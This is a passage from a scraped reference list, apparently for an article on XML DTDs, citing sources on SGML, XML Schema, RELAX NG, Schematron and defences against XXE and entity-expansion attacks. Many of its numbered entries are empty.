    XML Document Type Definition (DTD) - Library of Congress
    May 8, 2024 · An XML Document Type Definition is a formal expression (in XML) of the structural constraints for a class of XML documents. The DTD language ...
  7. [7]
    Document Type Definition (DTD) - Glossary | CSRC
    A document defining the format of the contents present between the tags in an XML or SGML document, and the way they should be interpreted.
  8. [8]
  9. [9]
  10. [10]
    ISO 8879:1986
    ### Summary of ISO 8879:1986
  11. [11]
    Standard Generalized Markup Language (SGML). ISO 8879:1986
    SGML is an international standard for semantic markup of textual documents, separating content from formatting, and using document type definitions (DTD).Missing: origins | Show results with:origins
  12. [12]
    HyperText Markup Language (HTML), versions prior to 2.0
    Mar 28, 2018 · SGML, Standard Generalized Markup Language (SGML). ISO 8879:1986. Early versions of HTML were defined by an SGML DTD (Document Type Definition).
  13. [13]
    Extensible Markup Language (XML) 1.0 - W3C
    Feb 10, 1998 · W3C's role in making the Recommendation is to draw attention to the specification and to promote its widespread deployment. This enhances the ...Missing: incorporation | Show results with:incorporation
  14. [14]
    Comparison of SGML and XML - W3C
    Dec 15, 1997 · External entity references in attribute values are not allowed; Parameter entity references are allowed in the internal subset only within a ...
  15. [15]
    XML Schema Part 1: Structures Second Edition - W3C
    Oct 28, 2004 · This is a W3C Recommendation, which forms part of the Second Edition of XML Schema. This document has been reviewed by W3C Members and other ...XML Schema Abstract Data... · Model Groups · Layer 3: Schema Document...
  16. [16]
    XML Schema Part 2: Datatypes Second Edition - W3C
    Oct 28, 2004 · XML Schema: Datatypes is part 2 of the specification of the XML Schema language. It defines facilities for defining datatypes to be used in XML Schemas as well ...
  17. [17]
  18. [18]
  19. [19]
  20. [20]
  21. [21]
  22. [22]
  23. [23]
  24. [24]
  25. [25]
  26. [26]
  27. [27]
  28. [28]
  29. [29]
  30. [30]
  31. [31]
  32. [32]
  33. [33]
  34. [34]
  35. [35]
  36. [36]
  37. [37]
  38. [38]
  39. [39]
  40. [40]
  41. [41]
  42. [42]
  43. [43]
  44. [44]
  45. [45]
  46. [46]
  47. [47]
  48. [48]
  49. [49]
  50. [50]
    [PDF] 3 8879
    This international standard, ISO 8879, is for Standard Generalized Markup Language (SGML) in text and office systems, prepared by ISO/TC 97.Missing: origins | Show results with:origins<|separator|>
  51. [51]
  52. [52]
  53. [53]
  54. [54]
  55. [55]
  56. [56]
  57. [57]
    Using C++ Namespace - Apache Xerces
    When caching/reusing DTD grammars, no internal subset is allowed. · When preparsing grammars with caching option enabled, if a grammar, in the result set, ...
  58. [58]
  59. [59]
    Namespaces in XML 1.0 (Third Edition) - W3C
    Dec 8, 2009 · Note that DTD-based validation is not namespace-aware in the following sense: a DTD constrains the elements and attributes that may appear ...
  60. [60]
  61. [61]
  62. [62]
  63. [63]
  64. [64]
  65. [65]
  66. [66]
  67. [67]
  68. [68]
  69. [69]
  70. [70]
    RELAX NG Specification - OASIS Open
    RELAX NG Specification. Approved: 01 Nov 2001. The definitive specification of RELAX NG, a simple schema language for XML, based on [RELAX] and ...
  71. [71]
    RELAX NG Compact Syntax - OASIS Open
    Nov 21, 2002 · This specification describes a compact, non-XML syntax for [RELAX NG]. The goals of this syntax are to: maximize readability;; support all ...Missing: ISO | Show results with:ISO
  72. [72]
    Balisage Paper: RELAX NG and DITA: An Almost Perfect Match
    Aug 5, 2014 · The most dramatic advantage of RELAX NG over both DTD and XSD is the ability for one pattern to unilaterally extend another pattern. This allows ...Introduction · Xsd Redefine Facility · How Relax Ng Addresses Dita...
  73. [73]
    RELAX NG's Compact Syntax - XML.com
    Jun 19, 2002 · RELAX NG is also part of an ISO draft standard, ISO/IEC DIS 19757-2. RELAX NG schemas were originally written in XML, but there's also a ...
  74. [74]
    ISO/IEC 19757-3:2020 - Information technology — Document ...
    This document establishes requirements for Schematron schemas and specifies when an XML document matches the patterns specified by a Schematron schema.
  75. [75]
    Schematron | Schematron
    The international standard is ISO/IEC 19757-3. · The schemas for Schematron from the international standard are Open Source/Open Standards: they are available at ...ISO Schematron 2020 released · Overview · Converting Schematron to... · News
  76. [76]
    Validating XML with Schematron
    Nov 22, 2000 · Schematron is an XML schema language, and it can be used to validate XML. In this article I show how to do the latter.Document Type Definitions... · Structure Of A Schematron... · Powered By Xpath
  77. [77]
    RelaxNG - XML Schema language - censhare Documentation
    Another advantage of RelaxNG over XSD in the area of document-oriented applications is: RelaxNG can validate at element level. Therefore, it is always ...Relaxng -The Better Choice... · Appendices · Appendix 2: Examples Of The...
  78. [78]
    Jing - Relax NG
    Prints the time used by Jing for loading the schema and for validation. When you use jing.jar with the -jar option, any jar files that have the same names as ...
  79. [79]
    Custom Business Rules for DITA Projects - IXIA CCMS
    Jul 13, 2023 · The examples here are all for DITA content but you can use Schematron with any XML tagset, including custom XML tagsets. You can even use ...
  80. [80]
    The Transition Guide - DocBook V5.0
    Oct 28, 2007 · DocBook RELAX NG schema organization. The DocBook RELAX NG schema is highly modular, using named patterns extensively. Every element, attribute ...
  81. [81]
    XML External Entity (XXE) Processing - OWASP Foundation
    This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.Nvd Categorization · Description · Examples
  82. [82]
    What is XXE (XML external entity) injection? Tutorial & Examples
    XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML ...
  83. [83]
    XML Denial of Service Attacks and Defenses | Microsoft Learn
    The easiest way to defend against all types of XML entity attacks is to simply disable altogether the use of inline DTD schemas in your XML parsing objects.
  84. [84]
    CWE-776: Improper Restriction of Recursive Entity References in ...
    If the DTD contains a large number of nested or recursive entities, this can lead to explosive growth of data when parsed, causing a denial of service.
  85. [85]
    XML External Entity Prevention - OWASP Cheat Sheet Series
    Disabling DTDs also makes the parser secure against denial of services (DOS) attacks such as Billion Laughs. If it is not possible to disable DTDs completely, ...
  86. [86]
    WordPress 5.7 XXE Vulnerability - Sonar
    Apr 27, 2021 · In this blog post we analyze a XXE vulnerability that our analyzers discovered in WordPress, the most popular CMS, and what PHP 8 developers ...Missing: incidents | Show results with:incidents
  87. [87]
    [PDF] XML Schema, DTD, and Entity Attacks - NCC Group
    May 19, 2014 · In the process of resolving external entities, an XML parser may consult various networking protocols and services. (DNS, FTP, HTTP, SMB, etc.) ...
  88. [88]
    XML Security - OWASP Cheat Sheet Series
    This is an example XML document with an embedded DTD schema including the attack: ... The previous XML defines an entity named xxe , which is in fact the contents ...Introduction · Dealing with malformed XML... · Dealing with invalid XML...